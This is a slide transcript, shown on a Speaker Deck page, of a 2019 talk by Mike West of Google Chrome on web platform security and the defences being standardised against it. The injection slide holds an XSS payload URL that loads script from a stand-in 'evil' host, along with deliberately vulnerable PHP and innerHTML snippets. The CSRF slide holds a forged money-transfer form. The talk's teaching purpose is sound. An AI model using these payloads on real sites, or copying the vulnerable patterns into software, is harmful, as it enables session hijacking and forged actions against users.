Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Web Platform Security @ TechDays 2019

3c27881a0d8695811b0fa23bd794e696?s=47 Mike West
June 03, 2019
Programming
1
82

Web Platform Security @ TechDays 2019

Web Platform Security.

3c27881a0d8695811b0fa23bd794e696?s=128

Mike West

June 03, 2019
Tweet

More Decks by Mike West

See All by Mike West
3c27881a0d8695811b0fa23bd794e696?s=48 mikewest
0
510
3c27881a0d8695811b0fa23bd794e696?s=48 mikewest
0
97
3c27881a0d8695811b0fa23bd794e696?s=48 mikewest
0
1.2k
3c27881a0d8695811b0fa23bd794e696?s=48 mikewest
0
320
3c27881a0d8695811b0fa23bd794e696?s=48 mikewest
0
54
3c27881a0d8695811b0fa23bd794e696?s=48 mikewest
2
540
3c27881a0d8695811b0fa23bd794e696?s=48 mikewest
0
230
3c27881a0d8695811b0fa23bd794e696?s=48 mikewest
5
1.3k
3c27881a0d8695811b0fa23bd794e696?s=48 mikewest
2
940

Other Decks in Programming

See All in Programming
15ea8d31e84f0b229ebd4aea87f02d30?s=48 canisterism
0
140
F6baf93a0833a98bdc8184c214f4c468?s=48 rgoswami
1
160
Ae276805027a01983503c3edafbdb6b2?s=48 martysuzuki
0
430
Aea43fe34799c7ae03e9793919e39c65?s=48 sisshiki1969
0
760
15934fa2aa7b2ce21f091e9b7cffa856?s=48 manfredsteyer
PRO
1
150
A760a90c9afd981004343b9861f1e8b4?s=48 daipresents
0
160
F77032adcbe77d2777bb0e0c30873159?s=48 etagwerker
1
170
63c01564f6afe7af88d5d6981790457d?s=48 shomatan
0
270
D40b43d43c4d8307c5334f1cb1da03a2?s=48 devinjeon
3
1.3k
0d4ef9af8e4f0cf5c162b48ba24faea6?s=48 ept
0
120
A581cbb76555d4854d3264a16fed5d13?s=48 daiki_0816
0
450
Dbab5e5a1fd54531e1119ede6b3b9e65?s=48 horie1024
2
340

Featured

See All Featured
78b475797a14c84799063c7cd073962f?s=48 holman
462
280k
4394ceb8b277f35ee3da7030384efb5d?s=48 davidbonilla
71
3.6k
719435d98d452de7ac367c828266cf01?s=48 erikaheidi
17
4.6k
64827b31aef81498662e8af4bd6d5157?s=48 jonrohan
1021
390k
78b475797a14c84799063c7cd073962f?s=48 holman
289
130k
8081b26e05bb4354f7d65ffc34cbbd67?s=48 chriscoyier
683
180k
7c8469ee8c9e594c65c59b919626c08d?s=48 scottboms
252
11k
88bc30284c6a424b63a92aad27d0ba36?s=48 jnunemaker
PRO
40
4.7k
24fc194843a71f10949be18d5a692682?s=48 gr2m
85
11k
C86443373fbfe92996aa882d0d7a59f8?s=48 imathis
479
150k
96270e4c3e5e9806cf7245475c00b275?s=48 addyosmani
1346
200k
6bb82b13cda86d3b821fa44100335ddf?s=48 thoeni
4
690

Transcript

  1. Web Platform Security Mike West, Google Chrome @mikewest mkwst@google.com http://bit.ly/wps_techdays_2019

  2. None
  3. None

  4. Google Vulnerability Reward Program (VRP) payouts in 2018 XSS 35.6%

    CSRF 3.2% Clickjacking 4.2% Other web bugs 7.8% Non-web issues 49.1% Mobile app vulnerabilities Business logic (authorization) Server /network misconfigurations ...

  5. Injections <?php echo $_GET["query"] ?> foo.innerHTML = location.hash.slice(1) 1. Logged

    in user visits attacker's page 2. Attacker navigates user to a vulnerable URL 3. Script runs, attacker gets access to user's session … and many other patterns Bugs: Cross-site scripting (XSS) https://victim.example/?query=<script src="//evil/">

  6. Insufficient isolation 1. Logged in user visits attacker's page 2.

    Attacker sends cross-origin request to vulnerable URL 3. Attacker takes action on behalf of user, or infers information about the user's data in the vulnerable app. Bugs: Cross-site request forgery (CSRF), XS-leaks, timing, ... <form action="/transferMoney"> <input name="recipient" value="Lukas" /> <input name="amount" value="10" /> <form action="//victim.example/transferMoney"> <input name="recipient" value="Attacker" /> <input name="amount" value="∞" />

  7. Insufficient isolation New classes of flaws related to insufficient isolation

    on the web: - Microarchitectural issues (Spectre / Meltdown) - Advanced web APIs used by attackers - Improved exploitation techniques The number and severity of these flaws is growing.

  8. Collaborate in standards bodies

  9. https://w3c.github.io/webappsec-csp/ https://csp.withgoogle.com/

  10. https://wicg.github.io/trusted-types

  11. https://tools.ietf.org/html/draft-ietf-httpbis-rfc6265bis https://web.dev/samesite-cookies-explained/

  12. https://w3c.github.io/webappsec-fetch-metadata

  13. https://github.com/whatwg/html/issues/3740

  14. https://github.com/whatwg/fetch/issues/687

  15. https://www.arturjanc.com/cross-origin-infoleaks.pdf

  16. Thanks! Mike West, Google Chrome @mikewest mkwst@google.com http://bit.ly/wps_techdays_2019